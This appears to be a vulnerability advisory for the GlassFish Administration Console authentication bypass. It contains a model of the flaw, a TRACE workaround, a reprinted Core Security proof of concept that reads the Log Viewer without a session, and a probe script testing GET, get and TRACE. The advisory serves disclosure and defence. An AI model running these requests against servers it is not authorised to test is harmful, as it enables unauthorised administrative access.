Description: A server affected by the Oracle GlassFish Server Administration Console GET Request Authentication Bypass fails to enforce authentication on HTTP requests whose method name is not one of the exact, uppercase method names the console checks for: a request with a lowercase method name (e.g. 'get') or, as in the proof of concept below, with the TRACE method reaches the console's pages without a session. A remote, unauthenticated attacker can use this to read administrative pages such as the Log Viewer and, since the console can deploy applications, to upload and execute arbitrary code.
Vulnerable packages: Oracle GlassFish Server 3.0.1
Sun GlassFish Enterprise Server 2.1.1
Non-vulnerable packages: Oracle GlassFish Server 3.1
Contact Oracle for patches for other GlassFish versions
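A model of the defect the description refers to, as an added example (this is not GlassFish code; the real console is a JSF application whose authentication logic is not reproduced here). The `vulnerable_filter` enforces the session check only for exact, uppercase method names, so any other method string falls through to the page; the `hardened_filter` beside it denies by default, authenticates before looking at the method, and compares methods case-insensitively. The `Request` class and the `log_viewer` stand-in are constructed for the example.

```python
from dataclasses import dataclass

LOG_VIEWER = "/common/logViewer/logViewer.jsf"


@dataclass
class Request:
    method: str
    path: str


def log_viewer(req):
    # Constructed stand-in for the protected Log Viewer page.
    return 200, "<html>server.log contents ...</html>"


def vulnerable_filter(req, authenticated):
    """Models the reported defect: the session check runs only when the
    method string is exactly one of the names the filter expects."""
    if req.method in ("GET", "POST") and not authenticated:
        return 302, "Location: login page"
    # Any other method string ('get', 'TRACE', ...) falls through to the page.
    return log_viewer(req)


def hardened_filter(req, authenticated):
    """Default deny: authenticate first, whatever the method; then serve only
    the methods the page is meant to answer, compared case-insensitively."""
    if not authenticated:
        return 302, "Location: login page"
    if req.method.upper() not in ("GET", "POST", "HEAD"):
        return 405, "Method Not Allowed"
    return log_viewer(req)


def compare(method, authenticated=False):
    """Status code each filter returns for one request to the Log Viewer."""
    req = Request(method, LOG_VIEWER)
    return (vulnerable_filter(req, authenticated)[0],
            hardened_filter(req, authenticated)[0])


if __name__ == "__main__":
    for m in ("GET", "get", "TRACE"):
        vuln, hard = compare(m)
        print(f"{m:6s} unauthenticated -> vulnerable: {vuln}  hardened: {hard}")
```

Running it shows the shape of the bug: an unauthenticated GET is redirected by both filters, while 'get' and TRACE are served by the vulnerable one and redirected by the hardened one; the hardened filter also refuses TRACE with 405 even for an authenticated session.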
Work around suggested by Core Security [1]:
For users who cannot upgrade to a patched version, the following workaround can be applied to block the TRACE vector used by the proof of concept:
- In the GlassFish Admin Console, go to the Tasks tree.
- Navigate through: Network Config > Protocols > admin-listener > HTTP
- There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save the changes.
- Finally, restart GlassFish:
C:\glassfishv3\bin>asadmin restart-domain
Caveat: disabling TRACE removes only that vector. The description above states that the check is also bypassed by lowercase method names such as 'get', which this setting does not affect, so treat the workaround as a stopgap and upgrade to a non-vulnerable version; restricting network access to the administration listener (port 4848 by default) to trusted hosts is a further stopgap.
Nessus Scanner can be used to check whether a host is vulnerable.
The following Python 2 code, published by Core Security, is a proof of concept for the vulnerability: it requests the Log Viewer page with the TRACE method and prints the response, which on a vulnerable server is the page content itself, i.e. the authentication has been bypassed [1]:
import sys
import httplib  # Python 2 standard library (http.client in Python 3)


def make_trace_request(host, port, selector):
    # Request the protected page with the TRACE method instead of GET; the
    # remaining headers only make the request look like an ordinary browser.
    print '[*] TRACE request: %s' % selector
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
               'Host': '%s:%s' % (host, port),
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'en-us,en;q=0.5',
               'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
               'Accept-Encoding': 'gzip,deflate',
               'Connection': 'close',
               'Referer': 'http://%s:%s%s' % (host, port, selector)}
    conn = httplib.HTTPConnection(host, port)
    conn.request('TRACE', selector, headers=headers)
    response = conn.getresponse()
    conn.close()
    # A vulnerable server answers 200 with the Log Viewer HTML instead of
    # redirecting to the login page.
    print response.status, response.reason
    print response.getheaders()
    print response.read()


if len(sys.argv) != 3:
    print "Usage: $ python poc.py <host> <port>\nE.g: $ python poc.py 192.168.0.1 4848"
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
# 4848 is the default port of the GlassFish administration listener
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
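An added check script (Python 3; not Core Security's code and not part of the original advisory) that extends the proof of concept to the lowercase-method variant from the description and to a plain GET as a baseline, and can be run again after the workaround to confirm that TRACE is now refused. The verdicts in `classify` are heuristics assumed for this example: a redirect, 401 or 403, or a 200 page mentioning a login form is read as authentication being enforced; a 200 HTML body as a bypass; 405/501 as the method being refused; and a 200 `message/http` body as the server echoing the TRACE request (TRACE enabled, but the console page not reached).

```python
import http.client
import sys

LOG_VIEWER = "/common/logViewer/logViewer.jsf"
# 'get' and 'trace' exercise the lowercase-method variant from the description.
PROBE_METHODS = ("GET", "get", "TRACE", "trace")


def classify(status, headers, body):
    """Verdict for one response (pure function, so it can be tested offline).
    Heuristic, assumed for this example; headers are lowercase-keyed."""
    ctype = headers.get("content-type", "").lower()
    low = body.lower()
    if status == 200 and ctype.startswith("message/http"):
        return "TRACE_ECHO"           # server echoed the request; page not reached
    if status == 200 and "login" in low:
        return "AUTH_REQUIRED"        # login form rendered with a 200 instead of a redirect
    if status == 200 and ("<html" in low or "logviewer" in low):
        return "BYPASS"               # protected page served without a session
    if status in (301, 302, 303, 307, 308, 401, 403):
        return "AUTH_REQUIRED"        # sent to the login page or refused outright
    if status in (405, 501):
        return "METHOD_REJECTED"      # listener no longer serves this method
    return f"UNKNOWN({status})"


def probe(host, port, method, path=LOG_VIEWER, timeout=10):
    """Send one request with the method string exactly as given (http.client
    does not normalise its case) and return (status, headers, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(method, path, headers={"Connection": "close"})
        resp = conn.getresponse()
        headers = {k.lower(): v for k, v in resp.getheaders()}
        body = resp.read(65536).decode("iso-8859-1", "replace")
        return resp.status, headers, body
    finally:
        conn.close()


def run(host, port):
    """Probe every method in PROBE_METHODS; returns {method: verdict}."""
    results = {}
    for method in PROBE_METHODS:
        try:
            results[method] = classify(*probe(host, port, method))
        except OSError as exc:
            results[method] = f"ERROR({exc})"
    return results


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: check.py <host> <port>   e.g. check.py 192.168.0.1 4848")
    for method, verdict in run(sys.argv[1], int(sys.argv[2])).items():
        print(f"{method:6s} {LOG_VIEWER} -> {verdict}")
```

On an unpatched server the expected picture is AUTH_REQUIRED for GET and BYPASS for the other three; after the TRACE workaround the two TRACE rows should change to METHOD_REJECTED while 'get' still reads BYPASS, which is the gap the caveat above describes. A fully patched server reports AUTH_REQUIRED (or METHOD_REJECTED) for every row.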
References
[1] Core Security advisory, "Oracle GlassFish Server Administration Console Authentication Bypass": http://www.coresecurity.com/content/oracle-glassfish-server-administration-console-authentication-bypass
[2] Bugtraq posting of the advisory: http://www.securityfocus.com/archive/1/517965/30/0/threaded